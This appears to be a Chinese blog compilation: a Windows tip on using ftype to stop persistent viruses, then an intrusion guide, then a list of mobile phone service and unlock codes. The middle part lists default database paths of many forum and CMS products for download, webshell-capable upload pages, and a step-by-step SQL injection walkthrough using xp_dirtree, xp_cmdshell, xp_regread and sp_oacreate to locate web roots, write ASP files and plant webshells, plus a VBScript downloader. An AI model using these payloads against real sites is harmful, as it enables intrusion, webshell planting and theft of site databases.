恋上⊙孤独

电脑中毒后，许多朋友会打开“进程管理器”，将几个不太熟悉的程序关闭掉，但有时会碰到这种情况：关掉一个，再去关闭另外一个时，刚才关闭的那个马上又运行了。再从注册表里先把启动项删除后，重启试试，刚删除的那些启动项又还原了。由于电脑只装一个操作系统，也没办法在另一个系统下删除这些病毒。上网下载专杀工具后，仍然不能杀掉。

　　如此翻来覆去，病毒未杀掉，人却濒临崩溃。这时怎么办呢?遇到这种情况，笔者向大家推荐一种方法。

　　第一步：在“开始→运行”中输入CMD，打开“命令提示符”窗口。

　　第二步：输入ftype exefile=notepad.exe %1，这句话的意思是将所有的EXE文件用“记事本”打开。这样原来的病毒就无法启动了。

　　第三步：重启电脑，你会看见打开了许多“记事本”。当然，这其中不仅有病毒文件，还有一些原来的系统文件，比如：输入法程序。

　　第四步：右击任何文件，选择“打开方式”，然后点击“浏览”，转到Windows\System32下，选择cmd.exe，这样就可以再次打开“命令提示符”窗口。

　　第五步：运行ftype exefile=%1 %*，将所有的EXE文件关联还原。现在运行杀毒软件或直接改回注册表，就可以杀掉病毒了。

　　第六步：在每一个“记事本”中，点击菜单中的“文件→另存为”，就可看到了路径以及文件名了。找到病毒文件，手动删除即可，但得小心，必须确定那是病毒才能删除。建议将这些文件改名并记下，重启后，如果没有病毒作怪，也没有系统问题，再进行删除，

　　附：Ftype的用法

　　在Windows中，Ftype命令用来显示及修改不同扩展名文件所关联的打开程序。相当于在注册表编辑器中修改“HKEY_CLASSES_ROOT”项下的部分内容一样。

　　Ftype的基本使用格式为：Ftype [文件类型[=[打开方式/程序]]]

　　比如：像上例中的ftype exefile=notepad.exe %1，表示将所有文件类型为EXE(exefile表示为EXE类型文件)的文件都通过“记事本”程序打开，后面的%1表示要打开的程序本身(就是双击时的那个程序)。

　　ftype exefile=%1 %*则表示所有EXE文件本身直接运行(EXE 可以直接运行，所以用表示程序本身的%1即可)，后面的%*则表示程序命令后带的所有参数(这就是为什么EXE文件可以带参数运行的原因)。

data/dvbbs7.mdb 动网论坛数据库
/databackup/dvbbs7.mdb 动网论坛数据库
/bbs/databackup/dvbbs7.mdb 动网论坛数据库
/admin/data/qcdn_news.mdb 青创文章管理系统数据库
/data/qcdn_news.mdb 青创文章管理系统数据库
/firend.mdb 交友中心数据库
/database/NewCloud6.mdb 新云管理系统6.0数据库
/database/PowerEasy4.mdb 动易网站管理系统4.03数据库
/blogdata/L-BLOG.mdb L-BLOG v1.08数据库
/database/bbsxp.mdb BBSXP论坛数据库
/access/sf2.mdb 雪人论坛程序v2.0数据库
/data/Leadbbs.mdb LeadBBS论坛 v3.14数据库
/bbs/Data/LeadBBS.mdb LeadBBS论坛 v3.14数据库
/bbs/access/sf2.mdb 雪人论坛程序v2.0数据库
/bbs/database/bbsxp.mdb BBSXP论坛数据库
/blog/blogdata/L-BLOG.mdb L-BLOG v1.08数据库
/fdnews.asp 六合专用BBS数据库
/bbs/fdnews.asp 六合专用BBS数据库
/admin/ydxzdate.asa 雨点下载系统 v2.0+SP1数据库
/data/down.mdb 动感下载系统XP Ver2.0数据库
/database/Database.mdb 轩溪下载系统 v3.1数据库
/db/xzjddown.mdb lhdownXp 下载系统数据库
/data/db1.mdb 动感下载系统XP v1.3数据库
/db/play.asp 娱乐先锋论坛 v3.0数据库
/mdb.asp 惊云下载系统 v1.2数据库
/admin/data/user.asp 惊云下载系统 V3.0数据库
/data_jk/joekoe_data.asp 乔客6.0数据库
/data/news3000.asp 沸腾展望新闻系统 v1.1数据库
/data/appoen.mdb 惠信新闻系统4.0数据库
/data/12912.asp 飞龙文章管理系统 v2.1数据库
/database.asp 动感极品下载管理系统 v3.5
/download.mdb 华仔软件下载管理系统 v2.3
/data/zm_marry.asp 动网SP2美化版数据库
/dxxobbs/mdb/dxxobbs.mdb dxxobbs论坛数据库
/database\yiuwekdsodksldfslwifds.mdb动力文章系统数据库

/database/article.asp     贫龙文章管理系统
/data/dvbbs7.mdb    动网论坛数据库 7.X
/databackup/dvbbs7.mdb     动网论坛默认备份数据库 7.0-7.1
/data/dvbbs8.mdb    动网论坛数据库 8.0
/admin/data/qcdn_news.mdb   青创文章管理系统数据库
/data/qcdn_news.mdb     青创文章管理系统数据库
/firend.mdb     交友中心数据库
/database/NewCloud6.mdb     新云管理系统6.0数据库
/database/PowerEasy4.mdb 动易网站管理系统4.03数据库
/database/PowerEasy5.mdb 动易网站管理系统5.X数据库
/database/PowerEasy6.mdb 动易网站管理系统6X数据库
/database/PowerEasy2006.mdb 动易网站管理系统2006数据库
/blogdata/L-BLOG.mdb L-BLOG v1.08数据库
/database/bbsxp.mdb BBSXP论坛数据库
/access/sf2.mdb 雪人论坛程序v2.0数据库
/data/Leadbbs.mdb LeadBBS论坛 v3.14数据库
/bbs/Data/LeadBBS.mdb LeadBBS论坛 v3.14数据库
/bbs/access/sf2.mdb 雪人论坛程序v2.0数据库
/bbs/database/bbsxp.mdb BBSXP论坛数据库
/blog/blogdata/L-BLOG.mdb L-BLOG v1.08数据库
/fdnews.asp 六合专用BBS数据库
/bbs/fdnews.asp 六合专用BBS数据库
/admin/ydxzdate.asa 雨点下载系统 v2.0+SP1数据库
/data/down.mdb 动感下载系统XP Ver2.0数据库
/database/Database.mdb 轩溪下载系统 v3.1数据库
/db/xzjddown.mdb lhdownXp 下载系统数据库
/data/db1.mdb 动感下载系统XP v1.3数据库
/db/play.asp 娱乐先锋论坛 v3.0数据库
/mdb.asp 惊云下载系统 v1.2数据库
/admin/data/user.asp 惊云下载系统 V3.0数据库
/data_jk/joekoe_data.asp 乔客6.0数据库
/data/news3000.asp 沸腾展望新闻系统 v1.1数据库
/data/appoen.mdb 惠信新闻系统4.0数据库
/data/12912.asp 飞龙文章管理系统 v2.1数据库
/database.asp 动感极品下载管理系统 v3.5
/download.mdb 华仔软件下载管理系统 v2.3
/data/zm_marry.asp 动网SP2美化版数据库
/dxxobbs/mdb/dxxobbs.mdb dxxobbs论坛数据库

/register/userreg_setp2.asp科讯CMS注册可上传小马
upfile_photo.asp
Upfile_Soft.asp
upfile_flash.asp
powered by mypower
upfile_other.asp
data/scadata.mdb
/db/com02.mdb
/User/UserReg.asp

如果网站只开了80端口，你会发现下面的方法是比较有用的，其中用的方法几乎都不是我发现的，文总包括一些注入时的个人经验和技巧方法可以说有4种(现在已知的)
　　第一种方法:

　　这个是<<怪异的SQL注入>>中介绍的方法

　　利用sqlserver的xp_dirtree,好的我们先来将一下方法,然后再说其优劣处(在原文的基础上作了点补充)

　　建立表

　　语句：http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000))--

　　返回：正常的信息!说明建表成功!继续!

　　(建的比原文的大一点,因为我遇过名子很长的文件,删除了那个id,因为没有什么用

　　语句：http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ’c:\’ --

　　返回：正常信息。说明写入C盘的所有目录成功了!爽!接下来就是取表了!暴它出来。(好像只有暴这种方法了)

　　语句：http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-

　　返回：Microsoft OLE DB Provider for SQL Server 错误 80040e07

　　将 varchar 值 ’@Inetpub’转换为数据类型为 int 的列时发生语法错误。

　　再依次爆出表中的目录名称!

　　语句：http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from

　　dirs where paths not in( ’@Inetpub’))--

　　返回：Microsoft OLE DB Provider for SQL Server 错误 80040e07

　　将 varchar 值 ’test’转换为数据类型为 int 的列时发生语法错误。

　　再依次爆出表中的目录名称!

　　好我们继续

　　语句：http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from

　　dirs where paths not in( ’@Inetpub’,’test’))--

　　返回：Microsoft OLE DB Provider for SQL Server 错误 80040e07

　　将 varchar 值 ’haha’转换为数据类型为 int 的列时发生语法错误。

　　再依次爆出表中的目录名称!

　　好了,你应该知道怎么做了吧,哈哈,就是把得到的表名添到那个括号里,有多少就放多少吧,

　　一点技巧:

　　有时候你会发现当输入类似

　　http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-

　　时不是显示出错,而是网页显示正常

　　晕了吧,别紧张哈

　　看看0<>(select top 1 paths from dirs) 说明返回是一个数字,

　　哈哈,测试一下看看是多少吧

　　100>(select top 1 paths from dirs)

　　返回正常

　　哈哈,用这种大于小于的方法很快就能猜出了

　　好我们继续

　　比如当出现

　　59=(select top 1 paths from dirs)

　　返回正常,

　　ok,说明名字是59

　　输入如下

　　http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from

　　dirs where paths not in( ’59’))--

　　记得带上引号哟

　　下面的方法就和原来的一样的了

　　还有一个问题就是

　　有时候用上面的方法输入59时,发现下一次的文件夹还是59

　　这个是怎么回事情呢?

　　呵呵,不知道你有没有注意过059和59是一样的?

　　就是这个原因了,哈哈,

　　http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from

　　dirs where paths not in( ’059’))--

　　发现显示下一个文件夹名字了,ok

　　优缺点分析:

　　优点就是所有的sqlserver用户都可以使用,因为xp_dirtree适用权限PUBLIC,

　　缺点是显示的是目录下的所有文件夹的名字,而且排列好像是没有什么顺序的,总之在好几千好几万个文件夹里找你想要的文件夹是痛苦的.

　　而且你知道了有那个文件夹也不能保证在根目录下,实在是痛苦的一件事情呀,很多时候是靠运气和耐力.

　　祝你成功

方法二:

　　利用xp_cmdshell

　　哈哈,这个大家一定很熟悉了吧,我就简单说一下

　　建立表

　　语句：http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000))--

　　返回：正常的信息!说明建表成功!继续!

　　(建的比原文的大一点,因为我遇过名子很长的文件,删除了那个id,因为没有什么用

　　语句：http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_cmdshell ’dir c:\ /B/D’ --

　　返回：正常信息。说明写入C盘的所有目录成功了!这里用了dir c:\ /B/D,哈哈,不知道/B/D什么作用就试验试验看

　　语句：http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-

　　返回：Microsoft OLE DB Provider for SQL Server 错误 80040e07

　　将 varchar 值 ’@Inetpub’转换为数据类型为 int 的列时发生语法错误。

　　再依次爆出表中的目录名称!

　　语句：http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from

　　dirs where paths not in( ’@Inetpub’))--

　　返回：Microsoft OLE DB Provider for SQL Server 错误 80040e07

　　将 varchar 值 ’test’转换为数据类型为 int 的列时发生语法错误。

　　再依次爆出表中的目录名称!

　　方法同上,就不说了

　　有时候我们也可以用下面的两个扩展来干些事情

　　1)我们可以利用xp_availablemedia来获得当前所有驱动器,并存入dirs表中：

　　5 ;insert dirs exec master.dbo.xp_availablemedia;--

　　我们可以通过查询temp的内容来获得驱动器列表及相关信息

　　(2)我们可以利用xp_subdirs获得子目录列表,并存入dirs表中：

　　5 ;insert into dirs exec master.dbo.xp_subdirs ’c:\’ ;--

　　优缺点分析:

　　很明显了,这样就不会出现xp_dirtree那种所有目录都放在一起的情况了,只会显示一级目录,找起来方便多了.

　　缺点也很明显,只有sa有这个权限,也有可能管理员删除了这个扩展(毕竟太强大了).

方法三:

　　这种方法很好

　　下面这个是原文

　　想到了使用adsutil.vbs程序,我是这样执行的

　　a’;exec master..xp_cmdshell ’cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/1/root>a.txt’;--是不是很长啦通过它我们可以把iis里面第一个虚拟web站点的设置情况(当然包括它所在的实际目录咯)，导入到a.txt中对于a.txt的实际位置默认当然是c:\winnt\system32,其实这都不是问题，不过遇到管理员把adsutil.vbs，删了或是放到别的地方我们就没办法了(不可能自已用echo 命令写一个吧)

　　第二步:用echo命令写下面的代码到c:\中,很多吗也不算吧

.....xp_cmdshell ’echo set fso1=createobject("scripting.filesystemobject")>c:\read.vbs’;-- 
.....xp_cmdshell ’echo Set WshShell = Wscript.createObject("Wscript.Shell")>>c:\read.vbs’ 
;-- 
..... 
-------------------read.vbs--------------------------------- 
set fso1=createobject("scripting.filesystemobject") 
Set WshShell = Wscript.createObject("Wscript.Shell") 
spa=WshShell.Environment("process")("windir") 
set fil =fso1.opentextfile(spa & "\system32\aa.txt") 
do while not fil.atendofstream 
nr=fil.readline 
if left(nr,4)="Path" then 
pa=mid(nr,instr(nr,")") 3,len(nr)-instr(nr,")")-3) 
exit do 
end if 
loop 
set fil1 =fso1.opentextfile(pa &"\dd.asp",2,true) 
fil1.writeline "" 
---------------cut here-------------------------------------  

　　第三步:当然就是执行read.vbs三,这样我们可以把aa.txt中的内容读出来找到web站点的实际路径

　　然后写一个叫dd.asp的文件在web站的根目录中,能否成功试试就知道咯

　　执行http://x.x.x.x/dd.asp

　　返回:\xxx

　　哈哈,的确是好方法,

　　不过原文好像有点问题

　　就是

　　set fil =fso1.opentextfile(spa %2B "\system32\aa.txt")

　　set fil1 =fso1.opentextfile(pa%2B"\dd.asp",2,true)

　　两句提交时会出错

　　于是我们想到了加号,和&的功能相同

　　还有就是写点什么东西到dd.asp呢?写入pa,哈哈

哈哈,改成了

-------------------read.vbs--------------------------------- 
set fso1=createobject("scripting.filesystemobject") 
Set WshShell = Wscript.createObject("Wscript.Shell") 
spa=WshShell.Environment("process")("windir") 
set fil =fso1.opentextfile(spa "\system32\aa.txt") 
do while not fil.atendofstream 
nr=fil.readline 
if left(nr,4)="Path" then 
pa=mid(nr,instr(nr,")") 3,len(nr)-instr(nr,")")-3) 
exit do 
end if 
loop 
set fil1 =fso1.opentextfile(pa "\dd.asp",2,true) 
fil1.writeline pa 
---------------cut here-------------------------------------- 

　　因为用浏览器提交时 号被转换成了空格,所以在提交的时候还应该把变成%2B,好了,应该可以了,如下

-------------------read.vbs--------------------------------- 
set fso1=createobject("scripting.filesystemobject") 
Set WshShell = Wscript.createObject("Wscript.Shell") 
spa=WshShell.Environment("process")("windir") 
set fil =fso1.opentextfile(spa %2B "\system32\aa.txt") 
do while not fil.atendofstream 
nr=fil.readline 
if left(nr,4)="Path" then 
pa=mid(nr,instr(nr,")") 3,len(nr)-instr(nr,")")-3) 
exit do 
end if 
loop 
set fil1 =fso1.opentextfile(pa %2B "\dd.asp",2,true) 
fil1.writeline pa 
---------------cut here--------------------------------------

如果发现1没有的话,我们可以该成2,3,4...........
　　a’;exec master..xp_cmdshell ’cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/2/root>a.txt’;--

　　但是这种方法只能在windows2000下使用,因为2003下新建的网站所在地址不是按照1234来排列的,好像是随机生成的,个人比较过几个2003下的

　　地址,没有发现什么规律.

　　优缺点分析

　　同上xp_cmdshell不是每一个用户都可以用的!还有一个问题是adsutil文件不一定存在,或者不一定在那个路径上,当然如果你原意的话你可以用

　　echo写一个(哈哈,老多老多行的哟),另外的一个问题是,如果主机上有很多站点怎么办?我遇到过一个有九个站点的主机,胆识只有第8个是有用

　　的,晕了吧,很难有人有嗯那个耐性会坚持到那么多的,早就崩溃了或许.还有就是不能在2003下用!

　　不过说实话,这个方法的确是一个好方法

　　方法四:

　　这个方法是要饭的提到的,通过xp_regread等从注册表里读出路径

　　以下推荐，获取网页路径(通过存储过程达到对注册表的读取)：

　　利用内置存储过程 xp_regread(读取注册表键值，权限public)：

　　语句：http：//www.xxx.com/list.asp?classid=1;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test

　　varchar(20) exec master..xp_regread @rootkey= HKEY_LOCAL_MACHINE , @key=

　　SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\ , @value_name= / , values=@test OUTPUT insert into paths

　　(path) values(@test)

　　IIS的默认路径的在注册表中HKEY_LOCAL_MACHINE\ SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\

　　利用爆字段将数据库的值读出来：

　　语句：http：//www.xxx.com/list.asp?classid=1 and 0<>(select top 1 paths from newtable)--返回： Microsoft OLE DB Provider for

　　ODBC Drivers 错误 80040e07 [Microsoft][ODBC SQL Server Driver][SQL Server]将 varchar 值 E：\www,,201 转换为数据类型为 int 的

　　列时发生语法错误。

　　这说明网页目录在E：\www，接下来也可以利用FSO直接写入ASP木马

　　如果得不到网页目录，怎么办呢?前提你要猜到网站是否使用默认WEB，或者使用域名作为WEB。

　　declare @o int exec sp_oacreate wscript.shell , @o out exec sp_oamethod @o, run , NULL,’ cscript.exe c：

　　\inetpub\wwwroot\mkwebdir.vbs -w "默认 Web 站点" -v "e","e：\"’

　　在默认的WEB站点下创建一个虚拟目录E，指向E：盘下。

　　declare @o int exec sp_oacreate wscript.shell , @o out exec sp_oamethod @o, run , NULL,’ cscript.exe c：

　　\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e browse’

　　给虚拟目录e加上浏览属性不错吧。给自己开虚拟服务。想那些网页目录路径，头都快破了。这下给自己一个天开眼了。那传WEBSHELL利用MS

　　SQL为我们的工作告了一段落了，接下来工作应该由你来了。

　　哈哈,方法不错哟,通过注册表来读,方便快捷!

　　优缺点分析：

　　优点当然是方便快捷了。缺点是只能察看默认的iis站点的路径，如果不再默认的站点那就无能为力了(我用regsnape跟踪过)，如果在2003下

　　那就是连默认的站点路径也不显示了!痛苦中

　　顺便说两句，

　　实际上除了找网站路径的方法外，还是有别的方法来继续入侵的，比如说通过tftp来上传反弹木马，或者是通过写一个iget.vbs来下载你想要

　　的东东

　　iget.vbs代码如下：

－－－－－－－－－start－－－－－－－－－－ 
Set xPost = createObject("Microsoft.XMLHTTP") 
xPost.Open "GET",LCase(WScript.Arguments(0)),0 
xPost.Send() 
Set sGet = createObject("ADODB.Stream") 
sGet.Mode = 3 
sGet.Type = 1 
sGet.Open() 
sGet.Write(xPost.responseBody) 
sGet.SaveToFile LCase(WScript.Arguments(1)),2 
－－－－－－－－－－end－－－－－－－－－－－  

　　对此文的在补充

　　近日发现对毛主席大人的指示理解不够深刻，特在此表示补充

　　实际上上面的各种方法根本就不需要比较了xp_dirtree是最好的，只要这一种方法就够了

　　只是因为我当初太..............

　　今日将xp_dirtree的秘密再挖一下

　　好，我们exec master..xp_dirtree’d:/test’

　　假设我们在test里有两个文件夹test1和test2在test1里又有test3

　　结果显示

　　subdirectory depth

　　test1 1

　　test3 2

　　test2 1

　　哈哈发现没有那个depth就是目录的级数

　　ok了，知道怎么办了吧

　　http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--

　　http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ’d:\’ --

　　http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-

　　只要加上id=1，就是第一级目录 。

。。昨天有个朋友问我手机解锁密码是什么。。。有没有别的方法可以破解。。其实我也不知道怎么回答。。平时都是玩、电脑。手机就用来发信息打电话。。没玩别的

这个是我在网上查的。。

我希望能帮到某些朋友

• 手机解锁全集!!!超级实用!!!【绝对实用】
  
• 
  
• 
  
• 
  
• 
  
• 解话机锁：*2767*2878#/*2767*7377#
  
• 　三星码片复位：*2767*3855# 也可用于解机锁或卡锁
  
• 　三星显温度、电池容量：*#0228# 或*#8999*228#
  
• 　三星调显示屏对比度：*#0523#
  
• 　三星软件版本：*#9999#
  
• 　三星A100-A188看版本：*#0837#
  
• 　摩托罗拉T2688解所有锁：19980722
  
• 　T2688/2988/988d没有中文：*#0000# OK（插卡）
  
• 　摩托罗拉所有机锁：按MENU+5+1/2
  
• 　西门子恢复出厂设置：*#9999#
  
• 　西门子乱文回中文：*#0000#/*#0086#
  
• 　西门子软件版本：*#06# 左键
  
• 　爱立信老机回英语：*#0000#
  
• 　爱立信新机回英语：按CLR-左键-0000-右键
  
• 　爱立信显出厂日期：右、*、左、左、*、左、*键
  
• 　诺基亚显出厂日期：*#0000#（插卡）
  
• 　诺基亚省30％电：*#746025625#
  
• 　飞利浦强迫重连网：*#2562*#
  
• 　飞利浦显示和更改手机密码：*#7489*#
  
• 　博世(BOSCH)909S回中文：*#0852#
  
• 　博世(BOSCH)909s回英文：*#0851#
  
• 　NEC显软件版本：*#2820#
  
• 　NEC恢复原厂设置：*#73738#
  
• 　波导s1000隐藏功能：*#*#1705#
  
• 　波导s1000解锁：*#*#1705#46(也用于999D,720)
  
• 　如死机再用---24681357（或直接就用它解）
  
• 　波导8xx/9xx系列：*#+串号7-14位#
  
• 　SIM卡 波导串号最后9位去掉最后一位
  
• 　阿尔卡特OT221/220解锁：25228352/ALCATEL+D
  
• 　阿尔卡特OT301/302解锁：83227423
  
• 　阿尔卡特OT500/700解锁：25228352
  
• 　康佳：*#0001# *#1001# ##1001#
  
• 　康佳小雪5219：#8879576# 原始：1234
  
• 　GVC：*#1001* （海尔）
  
• 　南方高科320开机键入##1001#，然后装上卡输入0000 OK
  
• 　三菱NET LOCK：*787090或*787292
  
• 　三菱IMSI LOCK：*362628或*360608
  
• 　三菱NETSUB LOCK：*476989
  
• 　三菱CP LOCK：*482896或*480896
  
• 　三菱SP LOCK：*967678
  
• 　三菱EXT LOCK：*574243
  
• 
  
• 
  
• 飞利浦手机通用秘技
  
• 
  
• 　手机在待机状态下时，请输入以下按键组合：
  
• 　*#06# 查看IME串码
  
• *#2254*#显示状况行
  
• 　*#2255*#开启或关闭（DEBUG CALL）模式
  
• 　*#2558*#显示通话时间
  
• 　*#2562*#强迫重新连接网络系统
  
• 　*#7489*#显示和更改手机密码
  
• 　*#7378*#显示一些SIM卡信息，例如相位(phaselevel)
  
• 　*#3377*#读取SIM卡信息，初始化和标示
  
• 　*#7693*#开启或关闭睡眠模式
  
• 　*#8463*#读取睡眠模式信息
  
• 　*#337*# EFR模式开/关
  
• 　*#4764*#单频/双频设置(切换单频GSM900)
  
• 　*#4765*#单频/双频设置(切换单频GSM1800)
  
• 　*#4762*#单频/双频设置(切换成双频模式)
  
• 
  
• 
  
• 阿尔卡特(ALCATEL)测试键
  
• 
  
• 　 在待机状态下，输入“000000*”可监测网络状况，包括信号强度和使用中的频道等。
  
• 
  
• 
  
• NEC DB2000手机秘技 在待机时输入以下按键：
  
• 　“*#2820#”，再按通话键，可显示手机的软件版本。
  
• 　“*73738#”，再按通话键，可将回到手机出厂状态。
  
• 
  
• 
  
• 三星早期版本的手机，可以输入以下的指令各种进入测试状态：
  
• 
  
• 　　　按键代码 　　测试功能/名称
  
• 　　　*#9999# 显示手机软件版本号
  
• 　　　*2767*2878# 话机当前设定复位(手机解锁)
  
• 　　　*2767*3855# 话机EEPROM总复位(修复软件故障)
  
• 　　　*#9998*228# 电池参数读取
  
• 　　　*#9998*289# 振铃信号频率测试
  
• 　　　*#9998*246# 程序参数显示
  
• 　　　*#9998*364# WATCHDOG信号测试
  
• 　　　*#9998*377# EEPROM错误显示
  
• 　　　*#9998*427# WATCHDOG信号路径设置
  
• 　　　*9998*523# 液晶显示对比度调整
  
• 　　　*9998*636# 存贮状态显示
  
• 　　　*9998*786# 当前日期、时间读取
  
• 　　　*9998*842# 振子振动测试
  
• 　　　*9998*947# 在重大错误下复位设置
  
• 　　　*9998*9266# 显示收信通道号及收信强度
  
• 　三星新版手机（从三星600新版开始）所支持的测试指令减少了很多，基本上就只余下以下几个可以成功的：
  
• 　*2767*2878#（EEPROM复位）
  
• 　*2767*3855#（EEPROM总复位，IMEI有可能会变成初始码）
  
• 　*#9999#（查版本）
  
• 　*#0523#（调LCD对比度）
  
• 　*2767*7377# （解手机密码的复位指令）
  
• 　尤其是*#0523#的输入，有些型号的手机要插卡，有些不用。另外，如出现一次输入成功，而再输入失败的情况，是由于手机软件上的记忆效应，你可以将手机的电池卸下重装上再试输入（例如：*2767*3855# 指令输入后，有时不重装电池，手机是不能开机的）。
  
• 　　三星SGH-N288手机测试指令
  
• 　　*#0001# 显示RS232串行通信参数
  
• 　　*#0228# 显示电池容量、电压和温度
  
• 　　*#0246# 程序参数显示
  
• 　　*#0324# 网络检测（工程模式）
  
• 　　*#0364# 显示Watchdog状态,可以修改
  
• 　　*#0377# EEPROM错误显示
  
• 　　*#0427# WATCHDOG信号路径设置
  
• 　　*#0523# 调节对比度，谨慎修改；
  
• 　　*#0636# 存储器容量显示
  
• 　　*#0746# SIM卡文件规格测试
  
• 　　*#0778# SIM卡信息
  
• 　　*#0786# 显示内容为本次开机的时间及本次开机后到当前的时间长。按->后显示最新的本次开机后到当前的时间长；再按->后显示上一次的开机时间；再按->后显示上一次的关机时间以及上次开关机的时长。
  
• 　　*#0837# 显示详细的软件版本
  
• 　　*#0842# 振动测试
  
• 　　*#0947# 在重大错误情况下复位设置指令
  
• 　　*#9999# 显示软件版本
  
• 　　*2767*2878# EEPROM复位，手机设定总清除，可用于解锁
  
• 　　*2767*3855# 从字库中取出程序重置EEPROM为出厂值。对修改过IMEI码的手机，用此指令可恢复原出厂机身号码。此指令还用于因EEPROM（码片）内程序紊乱造成的各种故障。
  
• 
  
• 
  
• 
  
• 
  
• 西门子中文机秘籍大公开
  
• 
  
• 
  
• 　　输入[＊＃06＃]，可看IMEI(International Mobile Equipment Identity)码。
  
• 　　输入[＊＃06＃]＋[左软键]，可看软件版本号。 以上不需插入SIM卡也可操作。
  
• 　　输入[＊＃0000＃]＋[发射键]，改成预设语言显示(英语？)。
  
• 　　输入[＊＃0001＃]＋[发射键]，改成英文显示。
  
• 　　输入[＊＃0086＃]＋[发射键]，改成简体中文显示。
  
• 　　输入[＊＃0886＃]＋[发射键]，改成繁体中文显示。
  
• 　　快速键
  
• 　　长按[＊]，开启或关闭铃声。
  
• 　　长按[＃]，开启或关闭键盘锁。
  
• 　　长按[左侧上键]，开启情景模式设置。
  
• 　　长按[左侧下键]，开启语拨号。
  
• 　　短按[右侧录音键]，播放已录下的音，可在任何时候播放，包括通话期间，通话双方都听到。
  
• 　　长按[右侧录音键]，开始录音，直到放开，或２０秒已到。
  
• 　　当使用键盘锁時，可长按[挂断键]來暂时开启夜光照明。
  
• 　　连按两下[电话簿]可进入VIP电话簿。
  
• 　　[１]＋[发射键]可进入语音信箱（需在[菜单→短消息→语音信箱]设置语音信箱服务号码）。
  
• 　　[０]＋[左软键]可切換１号２号线路（好象大部分地区不支持，包括珠海）。
  
• 　　[数字键]＋[＃]可显示出儲存在SIM卡该位置的电话簿名称(前提是至少在SIM卡储存一个电话)。
  
• 　　长按[０]会出现＋字，并可用左软键来选择国家长话代码（位置依英文名称排列）。
  
• 　　快捷键设定 ：[数字键]→[左软键]→[右软键]（变更）此時会出現选项，选择即可（若是选择电话号码，则进入电话簿可选择要快速发射的电话名称）
  
• 　　使用 [数字键]→[发射键]即可。
  
• 　　西门子手机锁机解锁方法
  
• 　　请需要解锁的网友，将解锁码在开机状态下<插不插SIM卡无所谓>直接输入手机，然后等候自动解锁，时间约1秒至60分钟不等
  
• 
  
• 
  
• ★　如何解除摩托罗拉手机的PIN密码
  
• 
  
• 　　　　当你的设置的PIN不小心遗忘了，或别人在你的手机上设置了PIN等，这时PUK就帮了大忙了。在输错三次的PIN后则手机上会显示SIM卡已锁，这时你必须要通过PUK来解锁了。PUK为8位数字的码一般在大卡的背面，如果找不到的话要尽快到当地的客服中心查询，切不可乱输，因为PUK只有10次输错的机会，输错10次则SIM卡报销。摩托罗拉手机一般在输入PUK之前都必须先输入**05*再输PUK，格式如下：**05*PUK即可。
  
• 　　★　摩托罗拉手机的主清除与主复位
  
• 　　　　无论你的摩托罗拉手机上做了任何的设置，造成了如：不能正常拔入拔出，来电显示乱码，或无法删除电话本，等等，您都可以用以下方法复原。
  
• 　　　　MENU键+5+1（2）屏幕则会显示“主清除或主复位”如选择主清除将会执行以下操作：
  
• 　　　　1、从话机记忆中清除电话本项目。
  
• 　　　　2、清除最后呼出号码及最后呼入号码。
  
• 　　　　3、可清零计时表。
  
• 　　
  
• 　　　　但不能清除的功能有：固定号码表、本机号码表、计费表、收到和传出的短消息。
  
• 　　　　选择主复位，将执行以下：
  
• 　　　　1、返回最初的语言选择。
  
• 　　　　2、铃音恢复标准音量复为中，网络查找频度恢复为中，取消自动应答，声音提示计，时通话中显示计费，节电，自动免提，自动加锁，小区广播及通话传真方式。
  
• 　　★　摩托罗拉 T2688 键盘解锁
  
• 　　　　T2688有通过键盘解锁的功能，只要输入：19980722 即可，不过它只支持当前的卡解琐，无法实现手机的全复位。
  
• 　　★　MOTOROLA GSM手机的测试指令
  
• 　　　　测试状态的进入：
  
• 　　　　插入测试SIM卡后打开手机电源，当内部自动“叫醒”功能顺利完成后，按“＃”键三秒钟。
  
• 　　　　三秒钟后手机显示“TEST”，表明手机已进入测试状态，
  
• 　　 测试指令如下：
  
• 　　01＃：退出测试状态
  
• 　　02xxyy：显示/改变Tx功率电平DAC与装入PA校准表，类似于ETACS 72＃指令
  
• 　　07＃：关闭Rx Audio通道
  
• 　　08＃：打开Rx Audio通道
  
• 　　09＃：关闭Tx Audio通道
  
• 　　10＃：打开Tx Audio通道
  
• 　　11ABC＃：设置信道　ABC＝000~124
  
• 　　12AB＃：设置功率级电平　AB＝00~15
  
• 　　19＃：显示呼叫处理器软件版本
  
• 　　20＃：显示调制解调器软件版本
  
• 　　22＃：显示语音编解码器软件版本
  
• 　　82＃：看U801的版本号
  
• 　　24A＃：设置AGC步进　A＝0 or 1
  
• 　　25ABC＃：将连续的AGC置为ABC，ABC＝0~255
  
• 　　26ABCD＃：将连续的AFC置为ABCD，ABCD＝0~4095
  
• 　　31A＃：设定时隙为A，A＝0~7
  
• 　　33ABC＃：单步捕捉ABC信道
  
• 　　36＃：打开音频环路
  
• 　　37＃：中止测试
  
• 　　38＃：激活SIM卡
  
• 　　39＃：使SIM卡失效
  
• 　　40＃：发射全“1”信息
  
• 　　41＃：发射全“0”信息
  
• 　　43A＃：改变Audio通道至A
  
